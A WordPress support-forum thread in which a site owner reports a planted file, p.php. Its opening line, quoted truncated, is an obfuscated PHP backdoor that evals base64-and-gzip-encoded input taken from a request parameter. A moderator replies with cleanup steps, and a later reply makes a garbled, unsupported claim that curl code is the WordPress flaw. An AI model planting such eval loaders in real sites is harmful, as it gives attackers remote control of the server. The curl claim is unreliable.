Support » Plugins » WordPress 2.7 Vulnerability?

  • Hello all! There’s a problem I’ve got with the new WordPress in that I just found this file:

    <?php if(isset($_GET[‘p’])){eval(gzinflate(base64_decode(‘fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/j

    called p.php in my wordpress directory. It was placed there on the 14th. Our site went down today at roughly 8am because of several hundred computers all going to:



    Any ideas on how to make sure this issue won’t happen again? I’ve since moved p.php to a directory not accessible via the web.


Viewing 2 replies - 1 through 2 (of 2 total)
  • Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    That’s not necessarily a sign of a 2.7 vulnerability. It’s your host that did get compromised. Moving or removing the file is good, but you need to find and close the door that let that onto your blog.

    Check your file and directory permissions for your website. You should read up these links


    Did your WordPress site get hacked?

    Check your user table for any new accounts that you don’t recognize. You can use phpMyAdmin or mysql on the command line like so:

    USE yourwordpressdb;
    SELECT * FROM wp_users;

    This is just to see how bad the compromise is. If you are not seeing spammy hidden links in your blogs HTML, and you don’t see any users that you don’t recognize then WordPress may be fine.

    If you do find spammy links and new unknown users then get ready to restore your last good backup from before 12/14.

    Check your logs for the first occurrence of p.php to see if you can identify when and how it got on your blog.

    Read Donncha’s post and also check out

    Good luck.

    CURL is the wordpress vulnerability 2.7+

    class WP_Http_Curl {
    	function request($url, $args = array()) {
    		if ( !ini_get('safe_mode') && !ini_get('open_basedir') )
    			curl_setopt( $handle, CURLOPT_FOLLOWLOCATION, true );
    function wp_remote_get($url, $args = array()) {
    	$objFetchSite = _wp_http_get_object();
    	return $objFetchSite->get($url, $args);

    Read with google translator, this is why there are so many wordpress trojans. Kill ’em.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘WordPress 2.7 Vulnerability?’ is closed to new replies.